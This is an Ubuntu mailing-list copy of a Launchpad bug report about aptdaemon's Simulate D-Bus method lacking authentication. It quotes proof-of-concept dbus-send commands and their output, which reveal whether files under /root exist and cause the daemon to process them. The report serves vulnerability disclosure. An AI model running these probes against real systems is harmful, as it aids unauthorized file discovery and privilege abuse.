desktop-packages team mailing list archive
-
desktop-packages team
-
Mailing list archive
-
Message #133636
[Bug 1449587] Re: SImulate dbus method doesn't require authentication
** Also affects: software-center-aptdaemon-plugins (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to software-center-aptdaemon-plugins in
Ubuntu.
https://bugs.launchpad.net/bugs/1449587
Title:
SImulate dbus method doesn't require authentication
Status in aptdaemon package in Ubuntu:
Fix Released
Status in software-center-aptdaemon-plugins package in Ubuntu:
New
Bug description:
Reported via email from Tavis Ormandy:
-----
$ dbus-send --print-reply --system --dest=org.debian.apt
/org/debian/apt org.debian.apt.InstallFile string:/root/.bashrc
boolean:false
method return sender=:1.13166 -> dest=:1.13182 reply_serial=2
string "/org/debian/apt/transaction/1804d9c8373b4a00a905b029ca18ce13"
$ dbus-send --print-reply --system --dest=org.debian.apt
/org/debian/apt/transaction/1804d9c8373b4a00a905b029ca18ce13
org.debian.apt.transaction.Simulate
Error org.debian.apt.TransactionFailed: error-invalid-package-file:
Lintian check results for /root/.bashrc:
warning: "/root/.bashrc" cannot be processed.
$ dbus-send --print-reply --system --dest=org.debian.apt
/org/debian/apt org.debian.apt.InstallFile string:/root/.bashrca
boolean:false
method return sender=:1.13166 -> dest=:1.13184 reply_serial=2
string "/org/debian/apt/transaction/1a723099a3bb446c848dfcc46d0f5430"
$ dbus-send --print-reply --system --dest=org.debian.apt
/org/debian/apt/transaction/1a723099a3bb446c848dfcc46d0f5430
org.debian.apt.transaction.Simulate
Error org.debian.apt.TransactionFailed: error-unreadable-package-file:
/root/.bashrca
----
(mdeslaur): Not only does this expose the existence of arbitrary
files, but it actually access them and processes untrusted packages.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587/+subscriptions
